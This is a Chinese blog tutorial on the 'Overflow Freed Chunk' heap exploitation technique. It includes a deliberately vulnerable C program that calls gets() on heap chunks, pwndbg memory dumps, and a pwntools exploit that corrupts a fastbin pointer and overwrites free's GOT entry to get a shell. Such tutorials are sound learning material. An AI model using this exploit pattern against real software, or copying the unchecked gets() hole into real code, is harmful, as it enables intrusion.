Overflow Freed Chunk

最新推荐文章于 2021-09-10 19:18:48 发布
最新推荐文章于 2021-09-10 19:18:48 发布
阅读量3.7k 收藏
点赞数
分类专栏: Pwn
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/86585952
版权
Pwn 同时被 2 个专栏收录
28 篇文章 8 订阅
订阅专栏
6 篇文章 1 订阅
订阅专栏

一世风尘过往云烟 弯月又挂南山颠
不见故人轻舞翩跹 只闻落泪往昔间

简介

Overflow Freed Chunk可以理解为常规的堆溢出,即程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块
不难发现,堆溢出漏洞发生的基本前提:
程序向堆上写入数据
写入的数据大小没有被良好地控制

原理

与栈溢出所不同的是,堆上并不存在返回地址等可以让攻击者直接控制执行流程的数据,因此我们一般无法直接通过堆溢出来控制EIP
所以通常我们利用堆溢出的策略是:
1.覆盖与其物理相邻的下一个 chunk 的内容:
- prev_size
- size,主要有三个比特位,以及该堆块真正的大小
– NON_MAIN_ARENA
– IS_MAPPED
– PREV_INUSE
– the True chunk size
- chunk content,从而改变程序固有的执行流。
2.利用堆中的机制(如 unlink 等 )来实现任意地址写入( Write-Anything-Anywhere)或控制堆块中的内容等效果,从而来控制程序的执行流
通俗的来讲就是我们利用fastbin的分配和回收机制,构造出特定的一条chunk链,然后通过对上一个chunk的写入来溢出覆盖下一个chunk的fb指针,从而达到于fastbin_double_free一样的效果,需要注意的是我们在溢出的时候我们需要保留下一个chunk的一些基本信息,比如size的大小,inuse等

基本思路

基本步骤就是:
先申请两chunk:ptr[0]和ptr[1],然后先free(ptr[1]),再free(ptr[0]),此时ptr[0]z在ptr[1]的前面,即ptr[0]–>ptr[1];然后再次申请一个chunk,我们将拿到ptr[0],此时进行精心的溢出操作,可以覆盖到ptr[1],再次申请一次chunk将拿到ptr[1],最后再申请一次chunk就可以拿到特定位置的“chunk”,此时进行写入操作就可以修改成我们需要的内容了

实例

heap.c

#include<stdio.h>
#include<stdlib.h>
#include<string.h>

void sh(char *cmd)
{
	system(cmd);	
}

int main()
{
	setvbuf(stdout,0,_IONBF,0);
	int cmd,idx,sz;
	char *ptr[10];
	memset(ptr,0,sizeof(ptr));
	puts("1.malloc+gets\n2.free\n3.puts\n");
	while(1)
	{
		printf("> ");
		scanf("%d %d",&cmd,&idx);
		idx %= 10;
		if(cmd==1)
		{
			scanf("%d%*c",&sz);
			ptr[idx] = malloc(sz);
			gets(ptr[idx]);		//溢出
		}
		else if(cmd==2)
		{
			free(ptr[idx]);
			ptr[idx] = 0; 	//不再存在double_free
		}
		else if(cmd==3)
		{
			puts(ptr[idx]);
		}
		else
		{
			exit(0);
		}
	}
 	return 0;
}

编译:

gcc -no-pie heap.c -o heap -g -w

演示

root@sir-PC:/home/sir/desktop# gdb heap
GNU gdb (Debian 7.12-6+b2) 7.12.0.20161007-git
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 174 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from heap...done.
pwndbg> b 20
Breakpoint 1 at 0x40084c: file heap.c, line 20.
pwndbg> r
Starting program: /home/sir/desktop/heap 
1.malloc+gets
2.free
3.puts

> 
Breakpoint 1, main () at heap.c:20
20			scanf("%d %d",&cmd,&idx);
pwndbg> c
Continuing.
1 0
24 aaaabbbb	#ptr[0],第一次申请
> 
pwndbg> x/20gx 0x602660
0x602660:	0x0000000000000000	0x0000000000000021
0x602670:	0x6262626261616161	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000020981
0x602690:	0x0000000000000000	0x0000000000000000
0x6026a0:	0x0000000000000000	0x0000000000000000
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000000000
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
1 1
24 qqqqssss	#ptr[1],第二次申请
> 
pwndbg> x/20gx 0x602660
0x602660:	0x0000000000000000	0x0000000000000021
0x602670:	0x6262626261616161	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000021
0x602690:	0x7373737371717171	0x0000000000000000
0x6026a0:	0x0000000000000000	0x0000000000020961
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000000000
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
2 1	#free(ptr[1])
> 
pwndbg> x/20gx 0x602660
0x602660:	0x0000000000000000	0x0000000000000021
0x602670:	0x6262626261616161	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000021
0x602690:	0x0000000000000000	0x0000000000000000
0x6026a0:	0x0000000000000000	0x0000000000020961
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000000000
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
2 0	#free(ptr[0])
> 
pwndbg> x/20gx 0x602660
0x602660:	0x0000000000000000	0x0000000000000021
0x602670:	0x0000000000602690	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000021
0x602690:	0x0000000000000000	0x0000000000000000
0x6026a0:	0x0000000000000000	0x0000000000020961
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000000000
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000

现在我们再次申请chunk,在进行写入操作的时候造成溢出就可以覆盖下一个chunk,即ptr[1]的fb了,即完成了修改fb的操作,当我们再次申请两个chunk的时候,就可以跳转的我们修改的fb上了
这里我们先只演示可以发生溢出

pwndbg> c
Continuing.
1 2
24 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> 
pwndbg> x/20gx 0x602660
0x602660:	0x0000000000000000	0x0000000000000021
0x602670:	0x6161616161616161	0x6161616161616161
0x602680:	0x6161616161616161	0x6161616161616161
0x602690:	0x6161616161616161	0x6161616161616161
0x6026a0:	0x6161616161616161	0x6161616161616161
0x6026b0:	0x0061616161616161	0x0000000000000000 //溢出
0x6026c0:	0x0000000000000000	0x0000000000000000
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000

EXP

from pwn import *
p = process('./heap')
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
    gdb.attach(p)
    
def cmd(x):
    p.recvuntil('> ')
    p.send(x+'\n')

def malloc(i,s):
    cmd('1 %d\n24 %s'%(i,s))

def free(i):
    cmd('2 %d'%i)

malloc(0,'a'*8)
malloc(1,'b'*8)
free(1)
free(0)
malloc(2,'a'*24 + p64(0x21) + p64(0x601018))
malloc(3,'sh')
malloc(4, p64(0x4007d7))
p.recvuntil('> ')
p.sendline('2 3')
p.interactive()

这里我是将free的got表的地址换成了sh()函数的地址,然后在ptr[3]的位置写入了一个"sh"字符串,当我们调用free(ptr[3])时,就变成了调用system(ptr[3]),即system(sh);
这里需要注意的是溢出时字符串的构造:

pwndbg> x/20gx 0x602660
140 0x602660:   0x0000000000000000  0x0000000000000021
141 0x602670:   0x6161616161616161  0x6161616161616161
142 0x602680:   0x6161616161616161  0x0000000000000021 //<--这个位置是chunk的size需要保留,与申请的字节有关
143 0x602690:   0x0000000000601018  0x0000000000000000
144 0x6026a0:   0x0000000000000000  0x0000000000020961
145 0x6026b0:   0x0000000000000000  0x0000000000000000
146 0x6026c0:   0x0000000000000000  0x0000000000000000
147 0x6026d0:   0x0000000000000000  0x0000000000000000
148 0x6026e0:   0x0000000000000000  0x0000000000000000
149 0x6026f0:   0x0000000000000000  0x0000000000000000

exp.py运行结果:

sir@sir-PC:~/desktop$ python exp.py
[+] Starting local process './heap': pid 25427
[*] Switching to interactive mode
$ ls
core  exp.py  heap  heap.c 
$ whoami
sir
$ id
uid=1000(sir) gid=1000(sir)=1000(sir),7(lp),27(sudo),100(users),107(netdev),110(lpadmin),116(scanner),122(sambashare),996(autologin)
$
钞sir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
堆Heap块Chunk
分不清东西南北的Laffey
11-29 4200
堆&amp;块0x01 基础知识——Chunk0x02 基础知识——Heap0x03 堆的基本操作0x04 堆相关的函数1&gt;malloc2&gt;free0x05 堆溢出0x06 堆溢出中比较重要的几个步骤·寻找堆分配函数realloc malloc calloc·寻找危险函数·确定填充长度0x07 Fast bin0x08 Unsort bin注意点Fastbin attack--blin...
ctf堆溢出
m0_49959202的博客
11-01 1014
文章目录堆溢出1.介绍2.示例3.小结3.1 寻找堆分配函数3.1.1 malloc3.1.2 calloc3.1.3 relloc3.2 寻找危险函数函数3.3 确定填充长度 堆溢出 1.介绍 堆溢出指的是程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(堆块本身可使用的字节数>用户申请的字节数),因此导致了溢出,并覆盖到物理相邻的高地址的下一个堆块。 原理和栈溢出基本一样,不过堆溢出很难像栈溢出一样直接控制程序指向流程。一般堆溢出的策略为: 覆盖与其物理相邻的下一个chunk内容。
【20210910】【机器/深度学习】lightGBM模型训练中报错:“Cannot set reference after freed raw data“
诗小葵的博客
09-10 1245
一、原因在于: lightGBM模型训练完之后,Dataset的数据就会被清空,虽然在变量中它还存在,但实际已经被清空了,所以要再使用的话,需要重新生成! 二、补充知识点: lightGBM 模型训练时,输入的数据类型是 Dataset 格式,所以需要用 lgb.Dataset() 先进行格式转换! ...
Pwn-Overflow Free Chunk(堆溢出)
CharlesGodX的博客
03-22 1155
0x00:前言 这次介绍一种和栈溢出类似名字的堆溢出攻击,首先借用应用CTF-Wiki上的例子理解一下堆溢出。 0x01:漏洞介绍 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块,我们用两...
Fastbin Double Free
钞sir的博客
01-19 5008
似水流年月下花前 一舞倾城醉红颜 岁暮天寒月缺花残 独留孤影忆从前 简介 fastbin attack 是一类漏洞的利用方法,是指所有基于 fastbin 机制的漏洞利用方法,而fastbin_double_free就是其中的一种,这类漏洞利用的前提是: 存在堆溢出、use-after-free等能控制chunk内容的漏洞 漏洞发生于fastbin类型的chunk中 Fastbin Double...
disk-io.rar_Freed
09-23
This function is used to grab the root, and avoid it is freed when we access it. But it doesn t ensure that the tree is not dropped.
freed
03-17
已释放1 介绍 释放 软件架构 软件架构说明 安装教程 xxx xxx xxx 使用说明 ...使用Readme_XXX.md来支持不同的语言,例如Readme_en.md,Readme_zh.md ...全称是Gitee最有价值的开源项目,是综合评估出的优秀开源项目 ...
fake_glx_screen.rar_Freed
09-23
这个“fake_glx_screen.rar_Freed”似乎是一个针对GLX实现的特殊项目或库,旨在模拟或替代真实的GLX屏幕功能,并关注资源管理,特别是上下文(context)的分配和释放。 在描述中提到的"Number of context that are ...
FreeD
03-12
已释放1介绍释放软件架构软件架构说明安装教程xxx xxx xxx使用说明xxx xxx xxx参与贡献叉本仓库新建Feat_xxx分支提交代码新建Pull Request特技使用Readme_XXX.md来支持不同的语言,例如Readme_en.md,Readme_zh.md ...
关于FreeD升级和优化详解
08-20
FreeBSD升级和优化详解 FreeBSD是一个基于Unix的开源操作系统,它提供了许多强大且灵活的功能,使其成为企业级服务器的首选。本文旨在指导新手如何根据FreeBSD的升级和优化步骤,架设一台专业、高效、安全的FreeBSD...
堆溢出
weixin_44319142的博客
04-23 3142
原理 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块。 不难发现,堆溢出漏洞发生的基本前提是 1、程序向堆上写入数据。 2、写入的数据大小没有被良好地控制。 思路主要是 1、覆盖与其物...
HTTP协议之chunk介绍
热门推荐
Do-Program的专栏
04-12 5万+
当客户端向服务器请求一个静态页面或者一张图片时,服务器可以很清楚的知道内容大小,然后通过Content-Length消息首部字段告诉客户端需要接收多少数据。但是如果是动态页面等时,服务器是不可能预先知道内容大小,这时就可以使用Transfer-Encoding:chunk模式来传输数据了。即如果要一边产生数据,一边发给客户端,服务器就需要使用"Transfer-Encoding: chunked"...
几个 gbdt library对categorical feature的处理
qq_39638957的博客
04-28 973
XgBoost和Random Forest,不能直接处理categorical feature,必须先编码成为numerical feature。 lightgbm和CatBoost,可以直接处理categorical feature。 lightgbm: 需要先做label encoding。用特定算法(On Grouping for Maximum Homogeneity)找到optima...
lightGBM和XGBoost使用方法总结
机器学习、数据挖掘
11-07 2313
1.直接import  lightgbm as lgt 和import  XGBoost as lgt 这种方式在做训练的时候需要把数据转换成模型所能处理的格式,刚入手的人容易犯错 lightGBM为Dataset格式: lgb_train = lgb.Dataset(train_X, train_y, free_raw_data=False) lgb_eval = lgb.Dataset(t...
cannot open font file True
giftdawn的NoteBook
08-17 582
今天开机输入密码登陆后突然黑屏出现了如标题的这么一行字,一头的冷汗,还好重启后一切正常。网上搜了搜居然是个很常见的问题,只要把文本模式的字体修改为/lib/kbd/consolefonts里面的一个就没问题了——修改/etc/default/grub,将GRUB_CMDLINE_LINUX行中的SYSFONT=True改为 SYSFONT=latarcyrheb-sun16然后以root运行
LightGBMError: Length of label is not same with #data
微电子学与固体电子学-俞驰
09-15 6068
完整错误如下如下: --------------------------------------------------------------------------- LightGBMError Traceback (most recent call last) <timed exec> in <module>...
c++如何两次freed
最新发布
06-03
在C++中,重复释放同一个内存块可能会导致程序崩溃或其他未定义的行为。因此,必须非常小心地管理内存并确保不会重复释放相同的内存块。以下是两次释放内存的示例代码: ```c++ int* ptr = new int[10];...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值